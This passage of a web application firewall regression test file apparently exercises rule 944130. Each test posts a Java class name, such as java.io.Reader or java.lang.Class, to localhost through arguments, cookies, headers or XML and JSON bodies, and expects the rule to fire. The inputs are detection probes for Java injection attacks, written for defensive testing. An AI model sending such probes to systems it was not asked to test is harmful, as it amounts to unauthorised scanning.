- method: "POST" - version: "HTTP/1.0" - data: "java.io.PushbackInputStream" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-239 - desc: "Content-Type text/plain includes keyword java.io.PushbackInputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=java.io.PushbackInputStream" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-240 - desc: "Content-Type application/json arg value includes keyword java.io.PushbackInputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - 
User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.PushbackInputStream\"}" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-241 - desc: "Content-Type application/json arg name includes keyword java.io.PushbackInputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"java.io.PushbackInputStream\": \"test\"}" - output: - log_contains: "id \"944130\"" - - - test_title: 944130-242 - desc: "Argument test includes keyword java.io.Reader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=java.io.Reader" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-243 - desc: "Argument name includes keyword java.io.Reader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "java.io.Reader=test" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-244 - desc: "Cookie test includes keyword java.io.Reader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.Reader - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-245 - desc: "Cookie name includes keyword java.io.Reader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.Reader=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-246 - desc: "Request header test includes keyword java.io.Reader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.Reader - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-247 - desc: "XML attribute value includes keyword java.io.Reader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-248 - desc: "XML element value includes keyword java.io.Reader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.io.Reader" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-249 - desc: "Nested XML element value includes keyword java.io.Reader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: 
"ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.io.Reader" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-250 - desc: "Content-Type text/plain includes keyword java.io.Reader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=java.io.Reader" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-251 - desc: "Content-Type application/json arg value includes keyword java.io.Reader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.Reader\"}" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-252 - desc: "Content-Type application/json arg name includes keyword java.io.Reader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: 
"application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"java.io.Reader\": \"test\"}" - output: - log_contains: "id \"944130\"" - - - test_title: 944130-253 - desc: "Argument test includes keyword java.io.StringReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=java.io.StringReader" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-254 - desc: "Argument name includes keyword java.io.StringReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "java.io.StringReader=test" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-255 - desc: "Cookie test includes keyword java.io.StringReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.StringReader - method: "POST" - version: "HTTP/1.0" - 
data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-256 - desc: "Cookie name includes keyword java.io.StringReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.StringReader=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-257 - desc: "Request header test includes keyword java.io.StringReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.StringReader - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-258 - desc: "XML attribute value includes keyword java.io.StringReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - - - test_title: 
944130-259 - desc: "XML element value includes keyword java.io.StringReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.io.StringReader" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-260 - desc: "Nested XML element value includes keyword java.io.StringReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.io.StringReader" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-261 - desc: "Content-Type text/plain includes keyword java.io.StringReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=java.io.StringReader" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-262 - desc: "Content-Type application/json arg value includes keyword java.io.StringReader" - stages: - - - stage: - input: - 
dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.StringReader\"}" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-263 - desc: "Content-Type application/json arg name includes keyword java.io.StringReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"java.io.StringReader\": \"test\"}" - output: - log_contains: "id \"944130\"" - - - test_title: 944130-264 - desc: "Argument test includes keyword java.lang.Class" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=java.lang.Class" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-265 - desc: "Argument name includes keyword java.lang.Class" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 
Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "java.lang.Class=test" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-266 - desc: "Cookie test includes keyword java.lang.Class" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.lang.Class - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-267 - desc: "Cookie name includes keyword java.lang.Class" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.lang.Class=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-268 - desc: "Request header test includes keyword java.lang.Class" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.lang.Class - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-269 - desc: "XML attribute value includes keyword java.lang.Class" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-270 - desc: "XML element value includes keyword java.lang.Class" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.lang.Class" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-271 - desc: "Nested XML element value includes keyword java.lang.Class" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: 
"ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.lang.Class" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-272 - desc: "Content-Type text/plain includes keyword java.lang.Class" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=java.lang.Class" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-273 - desc: "Content-Type application/json arg value includes keyword java.lang.Class" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"java.lang.Class\"}" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-274 - desc: "Content-Type application/json arg name includes keyword java.lang.Class" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: 
"application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"java.lang.Class\": \"test\"}" - output: - log_contains: "id \"944130\"" - - - test_title: 944130-275 - desc: "Argument test includes keyword java.lang.Integer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=java.lang.Integer" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-276 - desc: "Argument name includes keyword java.lang.Integer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "java.lang.Integer=test" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-277 - desc: "Cookie test includes keyword java.lang.Integer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.lang.Integer - method: "POST" - version: "HTTP/1.0" - data: 
"test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-278 - desc: "Cookie name includes keyword java.lang.Integer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.lang.Integer=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-279 - desc: "Request header test includes keyword java.lang.Integer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.lang.Integer - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-280 - desc: "XML attribute value includes keyword java.lang.Integer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-281 - desc: 
"XML element value includes keyword java.lang.Integer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.lang.Integer" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-282 - desc: "Nested XML element value includes keyword java.lang.Integer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.lang.Integer" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-283 - desc: "Content-Type text/plain includes keyword java.lang.Integer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=java.lang.Integer" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-284 - desc: "Content-Type application/json arg value includes keyword java.lang.Integer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - 
